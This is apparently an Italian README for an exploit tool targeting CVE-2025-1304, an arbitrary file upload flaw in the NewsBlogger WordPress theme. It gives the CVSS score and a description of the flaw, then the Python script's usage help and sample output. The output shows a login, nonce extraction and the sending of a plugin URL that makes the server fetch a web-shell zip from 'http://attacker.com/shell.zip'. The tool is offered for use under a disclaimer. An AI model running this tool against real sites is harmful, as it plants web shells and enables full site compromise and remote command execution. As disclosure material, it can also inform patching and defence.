
Il tema WordPress NewsBlogger <= 0.2.5.1 è vulnerabile al caricamento arbitrario di file.
Punteggio CVSS: 8.8 (Alto)
Tipo di Vulnerabilità: Caricamento File Arbitrario
Componente: Tema WordPress
ID CVE: CVE-2025-1304
Il tema WordPress NewsBlogger (versioni <= 0.2.5.1) è vulnerabile a un Caricamento File Arbitrario tramite il pannello di benvenuto dell'amministrazione.
Questa vulnerabilità consente a qualsiasi utente autenticato — incluso chi dispone del ruolo minimo di Sottoscrittore — di caricare un archivio .zip dannoso contenente una web shell.
Il caricamento avviene tramite un campo URL del plugin non convalidato, che non verifica correttamente il contenuto o il tipo del file caricato.
Un attacco riuscito potrebbe portare al compromesso completo del sito web, inclusa l'esecuzione remota di comandi e l'escalation dei privilegi.
Questo script Python automatizza lo sfruttamento della vulnerabilità:
nonce dalla pagina di benvenuto vulnerabile.python CVE-2025-1304.py -h
usage: a.py [-h] --url URL --username USERNAME --password PASSWORD --shellweb SHELLWEB
WordPress NewsBlogger Theme vulnerable to Arbitrary File Upload #By: Nxploited ( Khaled Alenazi )
options:
-h, --help show this help message and exit
--url, -u URL Target base URL (e.g., http://target/wordpress)
--username, -un USERNAME WordPress admin username
--password, -p PASSWORD WordPress admin password
--shellweb, -shell SHELLWEB
Direct URL to the malicious shell zip (e.g., http://attacker.com/shell.zip)
[+] Logging in to http://target/wordpress/wp-login.php
[+] Logged in successfully.
[+] Fetching welcome page to extract nonce: http://target/wordpress/wp-admin/admin.php?page=newsblogger-welcome
[+] Extracted nonce: 012818100b
[+] Sending malicious plugin URL to: http://target/wordpress/wp-admin/admin-ajax.php
[+] Server response:
{"success":true,"data":{"redirect_url":"http://target/wordpress/wp-admin/admin.php?page=newsblogger-welcome"}}
Questo codice è fornito esclusivamente per scopi di formazione e test di sicurezza autorizzati.
L'autore non si assume alcuna responsabilità per un uso improprio o per danni causati da questo strumento.
Di: Nxploited ( Khaled Alenazi )